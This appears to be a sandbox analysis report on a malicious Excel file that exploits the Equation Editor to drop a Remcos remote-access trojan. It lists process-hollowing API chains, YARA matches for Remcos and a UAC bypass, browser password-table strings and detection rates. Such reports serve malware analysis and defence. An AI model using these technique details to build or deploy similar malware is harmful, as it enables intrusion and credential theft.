Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	17_2_004180EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,	17_2_004132D2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,	17_2_0041BB09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,	17_2_0041BB35

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_0027D5EB: CreateFileW,DeviceIoControl,CloseHandle,

3_2_0027D5EB

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_00271201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

3_2_00271201

Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0027E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	3_2_0027E8F6
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	16_2_010EE8F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,	17_2_004167B4

Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029EA3AC	3_3_029EA3AC
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_02A061D9	3_3_02A061D9
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029F0794	3_3_029F0794
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029D85C0	3_3_029D85C0
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029F0B06	3_3_029F0B06
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029EAB31	3_3_029EAB31
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029F6E4A	3_3_029F6E4A
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029F6C1B	3_3_029F6C1B
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029F0DB0	3_3_029F0DB0
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029D6D20	3_3_029D6D20
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029E8D7D	3_3_029E8D7D
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_02A092EE	3_3_02A092EE
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_02A5B244	3_3_02A5B244
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029F1332	3_3_029F1332
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029DB340	3_3_029DB340
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029F70A7	3_3_029F70A7
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029F1077	3_3_029F1077
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_02A37698	3_3_02A37698
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_02A41446	3_3_02A41446
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029D7460	3_3_029D7460
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_02A05B6B	3_3_02A05B6B
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_02A0D8FF	3_3_02A0D8FF
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029FBEA0	3_3_029FBEA0
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029DBEF0	3_3_029DBEF0
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_02A63C73	3_3_02A63C73
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0021BF40	3_2_0021BF40
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00218060	3_2_00218060
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00282046	3_2_00282046
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00278298	3_2_00278298
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0024E4FF	3_2_0024E4FF
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0024676B	3_2_0024676B
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_002A4873	3_2_002A4873
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0023CAA0	3_2_0023CAA0
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0021CAF0	3_2_0021CAF0
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0022CC39	3_2_0022CC39
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00246DD9	3_2_00246DD9
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0022B119	3_2_0022B119
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_002191C0	3_2_002191C0
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00231394	3_2_00231394
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00231706	3_2_00231706
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0023781B	3_2_0023781B
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F2046	16_2_010F2046
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_01088060	16_2_01088060
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010E8298	16_2_010E8298
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010BE4FF	16_2_010BE4FF
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010B676B	16_2_010B676B
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_01114873	16_2_01114873
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010ACAA0	16_2_010ACAA0
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_0108CAF0	16_2_0108CAF0
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010B6DD9	16_2_010B6DD9
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_0109CC39	16_2_0109CC39
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_0109B119	16_2_0109B119
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010891C0	16_2_010891C0
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A1394	16_2_010A1394
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A1706	16_2_010A1706
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_01087920	16_2_01087920
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_0109997D	16_2_0109997D
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A19B0	16_2_010A19B0
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A781B	16_2_010A781B
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A7A4A	16_2_010A7A4A
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A1C77	16_2_010A1C77
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A7CA7	16_2_010A7CA7
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A1F32	16_2_010A1F32
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_0110BE44	16_2_0110BE44
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010B9EEE	16_2_010B9EEE
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_001136A0	16_2_001136A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0043E0CC	17_2_0043E0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0041F0FA	17_2_0041F0FA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00454159	17_2_00454159
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00438168	17_2_00438168
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_004461F0	17_2_004461F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0043E2FB	17_2_0043E2FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0045332B	17_2_0045332B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0042739D	17_2_0042739D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_004374E6	17_2_004374E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0043E558	17_2_0043E558
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00438770	17_2_00438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_004378FE	17_2_004378FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00433946	17_2_00433946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0044D9C9	17_2_0044D9C9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00427A46	17_2_00427A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0041DB62	17_2_0041DB62
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00427BAF	17_2_00427BAF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00437D33	17_2_00437D33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00435E5E	17_2_00435E5E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00426E0E	17_2_00426E0E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0043DE9D	17_2_0043DE9D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00413FCA	17_2_00413FCA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00436FEA	17_2_00436FEA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_10017194	17_2_10017194
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_1000B5C1	17_2_1000B5C1

Source: 202404294766578200.xlam.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: String function: 0109F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: String function: 010A0A30 appears 46 times
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: String function: 01089CB3 appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00434770 appears 41 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00401E65 appears 35 times
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: String function: 00230A30 appears 36 times
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: String function: 029DC3A0 appears 34 times
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: String function: 0022F9F2 appears 40 times
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: String function: 029EFE30 appears 46 times

Source: sheet1.xml, type: SAMPLE	Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: bhvA8BE.tmp.20.dr

Binary or memory string: org.slneighbors

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winXLSX@35/20@6/7

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_002837B5 GetLastError,FormatMessageW,

3_2_002837B5

Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_002710BF AdjustTokenPrivileges,CloseHandle,	3_2_002710BF
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_002716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	3_2_002716C3
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010E10BF AdjustTokenPrivileges,CloseHandle,	16_2_010E10BF
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	16_2_010E16C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	17_2_00417952

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_002851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

3_2_002851CD

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_0029A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

3_2_0029A67C

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_0028648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

3_2_0028648E

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_002142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

3_2_002142A2

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

17_2_0041AA4A

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$202404294766578200.xlam.xlsx

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-E70NOS

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR9397.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000011.00000002.783921365.0000000003840000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000015.00000002.780294367.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: svchost.exe, 00000014.00000002.778860586.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.778751181.000000000016E000.00000004.00000020.00020000.00000000.sdmp, chp8E2E.tmp.20.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));"
Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: 202404294766578200.xlam.xlsx	ReversingLabs: Detection: 68%
Source: 202404294766578200.xlam.xlsx	Virustotal: Detection: 50%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
